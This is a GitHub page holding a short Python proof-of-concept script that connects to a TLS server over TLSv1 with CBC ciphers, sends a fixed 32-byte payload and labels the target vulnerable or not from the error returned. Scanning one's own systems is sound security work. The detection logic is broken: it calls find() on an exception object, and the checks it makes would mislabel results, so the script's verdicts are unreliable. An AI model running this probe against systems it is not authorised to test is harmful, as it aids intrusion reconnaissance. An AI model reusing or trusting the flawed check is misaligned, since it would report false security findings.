-
Notifications
You must be signed in to change notification settings - Fork 11
/
CVE-2016-2017.py
40 lines (32 loc) · 950 Bytes
/
CVE-2016-2017.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python
# Author Dario Clavijo 2018
# GPLv3
import socket
import ssl
import sys
ciphers = "AES128-SHA:AES256-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA"
# SET VARIABLES
# HOST, PORT = 'XX.XX.XX.XX', 4434
h = sys.argv[1].split(":")
print(h[0], h[1])
# CREATE SOCKET
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(120)
# print ssl.ciphers()
ssl_sock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers=ciphers)
ssl_sock.connect((h[0], int(h[1])))
print(ssl_sock.cipher())
# print sock.cipher()
print("connected...")
# ssl_sock.write("$")
ssl_sock.write("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
print("sent...")
try:
print(f"recv:{ssl_sock.recv(512)}")
except ssl.SSLError as err:
if err.find("record overflow"):
print("Vulnerable")
if err.find("bad record MAC"):
print("Not Vulnerable")
ssl_sock.close()
print("closed")